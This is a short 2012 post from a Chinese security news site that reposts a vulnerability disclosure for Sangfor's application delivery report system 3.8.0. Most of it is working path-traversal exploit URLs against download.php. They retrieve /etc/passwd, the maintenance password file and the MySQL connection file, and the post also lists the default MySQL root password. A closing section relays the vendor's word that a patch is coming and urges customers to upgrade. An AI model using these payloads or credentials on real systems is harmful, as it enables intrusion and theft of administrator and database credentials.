网络空间安全:行业资讯、技术分享、法规研讨、趋势分析……

“游侠安全网”创建了网络安全从业者QQ大群(群号:1255197) ,欢迎各位同仁加入!有其它问题如合作等,请联系站长“网路游侠”,QQ:55984512


速递:深信服应用交付报表系统漏洞 更新版

2012-09-13 17:20 推荐: 浏览: 308 views 字号:

摘要: 提醒:利用此漏洞进行非法入侵与本站无关,建议大家在授权的条件下测试。  Author: 7z1 版本:SANGFOR-AD-3.8.0 (深信服应用交付报表系统3.8.0) 下载漏洞 http://www.site.cn:85/report/download....

提醒:利用此漏洞进行非法入侵与本站无关,建议大家在授权的条件下测试。

 Author: 7z1

版本:SANGFOR-AD-3.8.0 (深信服应用交付报表系统3.8.0)

下载漏洞

http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd

深信服后台维护密码获取:

http://www.site.cn:85/report/download.php?pdf=../../../../..//etc/updateme/passwd

深信服应用交付报表系统MYSQL数据库账户获取:

http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/condb/conn_mysql.php

一般默认MYSQL账户密码 ($con = mysql_connect(“localhost”,”root”,”sinfors”); )

获取跟远端通信的端口

http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/include/gfad_get_remote_data.php

原文:http://www.1990day.com/index.php/0days/19.html

———————————————–

新浪微博的@lzhi 告诉游侠:

目前深信服该漏洞只在3.8版本以下存在,目前提供给到客户的应用交付版本为4.2.针对该漏洞的补丁会在近期提供。

游侠提醒:

未升级的客户请自行联系深信服升级。

其实,安全产品出现漏洞也是常事,一些国际大厂也不能避免。并且一般人也并不知道设备的IP地址,因此无需恐慌!

联系站长租广告位!

中国首席信息安全官


关闭


关闭